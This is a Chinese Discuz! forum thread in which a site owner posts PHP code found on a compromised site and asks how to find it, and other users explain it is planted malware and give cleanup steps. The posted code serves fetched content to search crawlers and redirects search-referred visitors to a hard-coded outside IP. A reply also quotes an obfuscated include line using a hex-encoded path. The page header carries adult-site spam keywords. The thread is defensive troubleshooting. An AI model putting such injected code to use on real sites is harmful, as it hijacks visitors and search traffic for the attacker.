久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

Discuz! 官方交流社區

標題: 這一段是什么意思,網站異常卡,是被掛馬了,怎么查找..... [打印本頁]
作者: monery2    時間: 2020-9-11 13:44
標題: 這一段是什么意思,網站異常卡,是被掛馬了,怎么查找.....
header('Content-Type:text/html;charset=gb2312');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,strtolower('HaosouSpider'))!== false||strpos($key,strtolower('baidu'))!== false||strpos($key,strtolower('Yisou'))!== false||strpos($key,strtolower('Sogou'))!== false||strpos($key,strtolower('YisouSpider'))!== false||strpos($key,strtolower('360Spider'))!== false||strpos($key,strtolower('Baiduspide'))!== false||strpos($key,strtolower('Soso'))!== false )
{
date_default_timezone_set('PRC');
$TD_server = "http://137.220.220.7/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;
}

$httpuser=strtolower($_SERVER['HTTP_REFERER']);
if(strstr($httpuser,'sogou') or strstr($httpuser,'baidu') or strstr($httpuser,'HaosouSpider') or strstr($httpuser,'YisouSpider'))

{

Header("Location: http://137.220.220.7/");//

exit;

}


怎么查找其他php文件也包含這個。。。鋪天蓋地的碼

作者: Killer    時間: 2020-9-11 15:51
您這可能是被掛馬了哦
作者: 好佳芯科技    時間: 2020-9-11 16:13
看樣子是木馬,https://addon.dismall.com/plugins/nayuan_safe.html
作者: allthebest    時間: 2020-9-12 04:37
若存在,處理前,先卸載所有盜版插件與模版。

進discuz后臺找到工具-文件校驗,看下最近有哪些php文件被修改了。

1、排查網站源文件的php 文件,查看是否有出現IP地址、或者異常網站(上面跳轉的網站),如果有刪除就可以了。

2、排查網站源文件的php 文件,查看是否有如下代碼:@include($_SERVER['DOCUMENT_ROOT']

(排查一般用WEBshell后門掃描軟件掃描核查!)

如果有就刪除此段代碼。并把該段代碼進行解密。

舉例:@include($_SERVER['DOCUMENT_ROOT'].PACK('H*','2F646174612F6176617461722F30'));

需要解密的代碼為:2F646174612F6176617461722F30

解密后為:/data/avatar/0

代碼解密地址:http://www.bejson.com/convert/ox2str/


意思就是在上述路徑下存在被非法上傳的文件,用于做快照劫持。

解決辦法:刪除上面的代碼和文件即可。

掛馬問題解決了后,記得更改服務器相關的各種密碼,盡量設置的復雜一點。
作者: 鴻茂傳媒    時間: 2020-9-14 13:38
被掛馬了。
作者: hhb121    時間: 2020-9-18 21:42
這個是被掛馬了,當搜索引擎訪問頁面后,自動跳轉到目標網站或者ip,出現這種問題,一般就是服務器安全沒做到位,或者使用了盜版插件造成的。



歡迎光臨 Discuz! 官方交流社區 (http://www.9999xn.com/) Powered by Discuz! W1.0